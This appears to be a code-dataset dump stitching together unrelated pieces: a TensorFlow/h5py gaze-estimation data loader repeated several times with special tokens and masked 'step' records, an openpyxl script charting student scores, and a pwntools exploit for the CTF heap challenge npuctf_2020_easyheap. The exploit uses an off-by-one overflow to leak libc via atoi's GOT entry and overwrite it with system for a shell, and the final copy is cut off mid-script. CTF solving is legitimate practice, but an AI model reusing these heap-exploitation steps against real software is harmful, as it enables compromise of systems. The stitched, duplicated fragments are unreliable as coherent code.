return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError(
'In dataset.py: default input not specified for this model!')
<|reserved_special_token_1|>
import tensorflow as tf
import tensorflow_io as tfio
import h5py
class GeneratorVGGNet:
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(
key) + '/head'], hf[str(key) + '/gaze']):
yield f, g, z
else:
for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +
'/head']):
yield f, g
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError(
'In dataset.py: default input not specified for this model!')
<|reserved_special_token_1|>
import tensorflow as tf
import tensorflow_io as tfio
import h5py
class GeneratorVGGNet:
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + "/left-eye"], hf[str(key) + "/head"], hf[str(key) + "/gaze"]) :
yield (f, g, z)
else:
for f, g in zip(hf[str(key) + "/left-eye"], hf[str(key) + "/head"]) :
yield (f, g)
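
# GeneratorVGGNet streams (left-eye, head[, gaze]) rows straight out of the
# HDF5 file; the Dataset class below uses the tfio streaming path instead and
# keeps the from_generator wiring only as commented-out reference code.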
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training, is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
# if (self.config['model'] == 'vggnet'):
# if is_training or is_testing:
# self.data = tf.data.Dataset.from_generator(
# GeneratorVGGNet(),
# output_types = (tf.uint8, tf.float32, tf.float32),
# output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2]), tf.TensorShape([2])),
# args=(self.path, False)
# )
# else:
# self.data = tf.data.Dataset.from_generator(
# GeneratorVGGNet(),
# output_types = (tf.uint8, tf.float32),
# output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2])),
# args=(self.path, True)
# )
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/gaze', spec=tf.float64)
# for key in keys[1:]:
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/left-eye', spec=tf.uint8)
# self.left_eye = self.left_eye.concatenate(temp)
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/head', spec=tf.float64)
# self.head = self.head.concatenate(temp)
# if is_training or is_testing:
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/gaze', spec=tf.float64)
# self.gaze = self.gaze.concatenate(temp)
if is_testing or is_training:
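            # tf.data.Dataset.zip pairs the lazily streamed HDF5 columns
            # element-wise into (left-eye image, head, gaze) samples.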
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError('In dataset.py: default input not specified for this model!')
|
flexible
|
{
"blob_id": "f94fcf6ed54f247093050216c0c331ce188da919",
"index": 9228,
"step-1": "<mask token>\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass GeneratorVGGNet:\n <mask token>\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError(\n 'In dataset.py: default input not specified for this model!')\n",
"step-3": "<mask token>\n\n\nclass GeneratorVGGNet:\n\n def __call__(self, filename, is_test):\n with h5py.File(filename, 'r') as hf:\n keys = list(hf.keys())\n for key in keys:\n if not is_test:\n for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(\n key) + '/head'], hf[str(key) + '/gaze']):\n yield f, g, z\n else:\n for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +\n '/head']):\n yield f, g\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError(\n 'In dataset.py: default input not specified for this model!')\n",
"step-4": "import tensorflow as tf\nimport tensorflow_io as tfio\nimport h5py\n\n\nclass GeneratorVGGNet:\n\n def __call__(self, filename, is_test):\n with h5py.File(filename, 'r') as hf:\n keys = list(hf.keys())\n for key in keys:\n if not is_test:\n for f, g, z in zip(hf[str(key) + '/left-eye'], hf[str(\n key) + '/head'], hf[str(key) + '/gaze']):\n yield f, g, z\n else:\n for f, g in zip(hf[str(key) + '/left-eye'], hf[str(key) +\n '/head']):\n yield f, g\n\n\nclass Dataset:\n\n def __init__(self, config, path, batch_size, shuffle, is_training,\n is_testing):\n self.config = config\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +\n '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[\n 0]) + '/gaze', spec=tf.float64)\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self\n .gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError(\n 'In dataset.py: default input not specified for this model!')\n",
"step-5": "import tensorflow as tf\nimport tensorflow_io as tfio\n\nimport h5py\n\nclass GeneratorVGGNet():\n def __call__(self, filename, is_test):\n with h5py.File(filename, 'r') as hf:\n keys = list(hf.keys())\n for key in keys:\n if not is_test:\n for f, g, z in zip(hf[str(key) + \"/left-eye\"], hf[str(key) + \"/head\"], hf[str(key) + \"/gaze\"]) :\n yield (f, g, z)\n else: \n for f, g in zip(hf[str(key) + \"/left-eye\"], hf[str(key) + \"/head\"]) :\n yield (f, g)\n\n\nclass Dataset():\n \n def __init__(self, config, path, batch_size, shuffle, is_training, is_testing):\n self.config = config\n\n self.is_training = is_training\n self.is_testing = is_testing\n self.path = path\n\n \"\"\"\n each archive contains:\n face - a list 224x224 BGR images of type uint8\n eye-region - a list 224x60 BGR images of type uint8\n left-eye - a list 90x60 BGR images of type uint8\n right-eye - a list 90x60 BGR images of type uint8\n head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.\n face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.\n gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.\n \"\"\"\n \n # if (self.config['model'] == 'vggnet'):\n # if is_training or is_testing:\n # self.data = tf.data.Dataset.from_generator(\n # GeneratorVGGNet(),\n # output_types = (tf.uint8, tf.float32, tf.float32),\n # output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2]), tf.TensorShape([2])),\n # args=(self.path, False)\n # )\n # else:\n # self.data = tf.data.Dataset.from_generator(\n # GeneratorVGGNet(),\n # output_types = (tf.uint8, tf.float32),\n # output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2])),\n # args=(self.path, True)\n # ) \n\n hdf5 = h5py.File(self.path, 'r')\n keys = list(hdf5.keys())\n \n self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/left-eye', spec=tf.uint8)\n self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/head', spec=tf.float64)\n if is_training or is_testing:\n self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/gaze', spec=tf.float64)\n\n # for key in keys[1:]:\n # temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/left-eye', spec=tf.uint8)\n # self.left_eye = self.left_eye.concatenate(temp)\n # temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/head', spec=tf.float64)\n # self.head = self.head.concatenate(temp)\n # if is_training or is_testing:\n # temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/gaze', spec=tf.float64)\n # self.gaze = self.gaze.concatenate(temp)\n\n if is_testing or is_training:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head, self.gaze))\n else:\n self.data = tf.data.Dataset.zip((self.left_eye, self.head))\n\n\n\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n def get_data(self):\n \"\"\" Method used to generate and preprocess tensorflow datasets for training and test data and validation data\"\"\"\n if self.config['model'] == 'vggnet':\n if self.is_training:\n return self.data.shuffle(self.shuffle).batch(self.batch_size)\n elif self.is_testing:\n return self.data.batch(self.batch_size)\n elif not self.is_testing and not self.is_training:\n return self.data.batch(self.batch_size)\n else:\n raise NotImplementedError('In dataset.py: default input not specified for this 
model!')\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n \n \n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
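# A minimal, self-contained sketch of the generator-based HDF5 pipeline used in
# the record above. It writes a tiny synthetic archive and streams it through
# tf.data.Dataset.from_generator, which avoids loading the whole file into
# memory. The group name 'subject01' and the sample count are invented for
# illustration; the per-sample shapes (60x90x3 eye crops, 2-vector head/gaze
# angles) follow the record's docstring.
import h5py
import numpy as np
import tensorflow as tf

with h5py.File('toy.h5', 'w') as hf:
    grp = hf.create_group('subject01')
    grp.create_dataset('left-eye', data=np.random.randint(0, 255, (8, 60, 90, 3), dtype=np.uint8))
    grp.create_dataset('head', data=np.random.randn(8, 2))
    grp.create_dataset('gaze', data=np.random.randn(8, 2))

def gen(filename):
    # Stream one (eye, head, gaze) triple at a time instead of loading everything.
    with h5py.File(filename, 'r') as hf:
        for key in hf.keys():
            for eye, head, gaze in zip(hf[key]['left-eye'], hf[key]['head'], hf[key]['gaze']):
                yield eye, head, gaze

ds = tf.data.Dataset.from_generator(
    lambda: gen('toy.h5'),
    output_signature=(
        tf.TensorSpec((60, 90, 3), tf.uint8),
        tf.TensorSpec((2,), tf.float64),
        tf.TensorSpec((2,), tf.float64),
    ),
).shuffle(8).batch(4)

for eye, head, gaze in ds:
    print(eye.shape, head.shape, gaze.shape)  # (4, 60, 90, 3) (4, 2) (4, 2)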
import openpyxl
from openpyxl import Workbook
import openpyxl as openpyxl
from openpyxl.chart import BarChart
wb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')
sheet = wb['stu_scores_01']
data = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,max_col=7)
cat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)
seriesObj = openpyxl.chart.Series(data, title="bar chart of each subject", title_from_data=True)
charObj = openpyxl.chart.BarChart()
charObj.title = "My Bar Chart"
charObj.x_axis.title = 'bar chart of each subject'
charObj.append(seriesObj)
charObj.set_categories(cat)
sheet.add_chart(charObj,"I2")
#new one
data = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,max_col=7)
cat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)
seriesObj = openpyxl.chart.Series(data, title="bar chart of boys each subject", title_from_data=True)
charObj = openpyxl.chart.BarChart()
charObj.title = "My Bar Chart"
charObj.x_axis.title = 'Boys each subject'
charObj.append(seriesObj)
charObj.set_categories(cat)
sheet.add_chart(charObj,"I18")
data = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,max_col=7)
cat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)
seriesObj = openpyxl.chart.Series(data, title="bar chart of girls each subject", title_from_data=True)
charObj = openpyxl.chart.BarChart()
charObj.title = "My Bar Chart"
charObj.x_axis.title = 'girls each subject'
charObj.append(seriesObj)
charObj.set_categories(cat)
sheet.add_chart(charObj,"Q2")
wb.save('stu_scores _Grade.xlsx')
wb.close()
|
normal
|
{
"blob_id": "bb9ff561ff94bbe4d20f14287ba313386ea78609",
"index": 9121,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I2')\n<mask token>\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I18')\n<mask token>\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'Q2')\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-3": "<mask token>\nwb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')\nsheet = wb['stu_scores_01']\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title='bar chart of each subject',\n title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'bar chart of each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I2')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of boys each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'Boys each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I18')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of girls each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'girls each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'Q2')\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-4": "import openpyxl\nfrom openpyxl import Workbook\nimport openpyxl as openpyxl\nfrom openpyxl.chart import BarChart\nwb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')\nsheet = wb['stu_scores_01']\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title='bar chart of each subject',\n title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'bar chart of each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I2')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of boys each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'Boys each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'I18')\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,\n max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,\n max_row=1)\nseriesObj = openpyxl.chart.Series(data, title=\n 'bar chart of girls each subject', title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = 'My Bar Chart'\ncharObj.x_axis.title = 'girls each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj, 'Q2')\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-5": "import openpyxl\nfrom openpyxl import Workbook\nimport openpyxl as openpyxl\nfrom openpyxl.chart import BarChart\n\nwb = openpyxl.load_workbook('/Users/mac/Desktop/stu_scores _Grade 2.xlsx')\nsheet = wb['stu_scores_01']\n\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=34, max_row=34,max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)\n\nseriesObj = openpyxl.chart.Series(data, title=\"bar chart of each subject\", title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = \"My Bar Chart\"\ncharObj.x_axis.title = 'bar chart of each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj,\"I2\")\n#new one\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=35, max_row=35,max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)\n\nseriesObj = openpyxl.chart.Series(data, title=\"bar chart of boys each subject\", title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = \"My Bar Chart\"\ncharObj.x_axis.title = 'Boys each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj,\"I18\")\n\ndata = openpyxl.chart.Reference(sheet, min_col=3, min_row=36, max_row=36,max_col=7)\ncat = openpyxl.chart.Reference(sheet, min_col=3, min_row=1, max_col=7,max_row=1)\n\nseriesObj = openpyxl.chart.Series(data, title=\"bar chart of girls each subject\", title_from_data=True)\ncharObj = openpyxl.chart.BarChart()\ncharObj.title = \"My Bar Chart\"\ncharObj.x_axis.title = 'girls each subject'\ncharObj.append(seriesObj)\ncharObj.set_categories(cat)\nsheet.add_chart(charObj,\"Q2\")\n\nwb.save('stu_scores _Grade.xlsx')\nwb.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
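# A sketch of the same charting pattern as the openpyxl record above: the three
# chart blocks differ only in the source row, the axis title, and the anchor
# cell, so they factor naturally into one helper. This version builds its own
# small sheet rather than assuming the original .xlsx exists; the subject names
# and scores are invented, while the column range C..G (min_col=3, max_col=7)
# mirrors the record.
import openpyxl
from openpyxl.chart import BarChart, Reference

def add_row_chart(sheet, row, title, anchor, min_col=3, max_col=7):
    # Chart one worksheet row as bars, using row 1 as the category labels.
    data = Reference(sheet, min_col=min_col, max_col=max_col, min_row=row, max_row=row)
    cats = Reference(sheet, min_col=min_col, max_col=max_col, min_row=1, max_row=1)
    chart = BarChart()
    chart.title = title
    chart.add_data(data, from_rows=True, titles_from_data=False)
    chart.set_categories(cats)
    sheet.add_chart(chart, anchor)

wb = openpyxl.Workbook()
ws = wb.active
ws.append(['', '', 'math', 'physics', 'chemistry', 'english', 'history'])  # labels in C1:G1
ws.append(['', '', 75, 82, 68, 90, 71])                                    # averages in C2:G2
add_row_chart(ws, row=2, title='average per subject', anchor='I2')
wb.save('charts_demo.xlsx')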
<|reserved_special_token_0|>
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
<|reserved_special_token_0|>
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
def show(index):
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Index :', str(index))
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
<|reserved_special_token_0|>
add(24, 'A' * 8)
add(24, 'B' * 8)
edit(0, 'A' * 24 + 'A')
delete(1)
add(56, 'A' * 8)
<|reserved_special_token_0|>
payload += p64(56) + p64(elf.got['atoi'])
edit(1, payload)
show(1)
sh.recvuntil('Content : ')
<|reserved_special_token_0|>
show_addr('libc_addr', libc_addr)
show_addr('system_addr', system_addr)
edit(1, p64(system_addr))
sh.interactive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
def show(index):
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Index :', str(index))
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn', 27634)
add(24, 'A' * 8)
add(24, 'B' * 8)
edit(0, 'A' * 24 + 'A')
delete(1)
add(56, 'A' * 8)
payload = 'A' * 16 + p64(0) + p64(33)
payload += p64(56) + p64(elf.got['atoi'])
edit(1, payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8, '\x00')) - libc.sym['atoi']
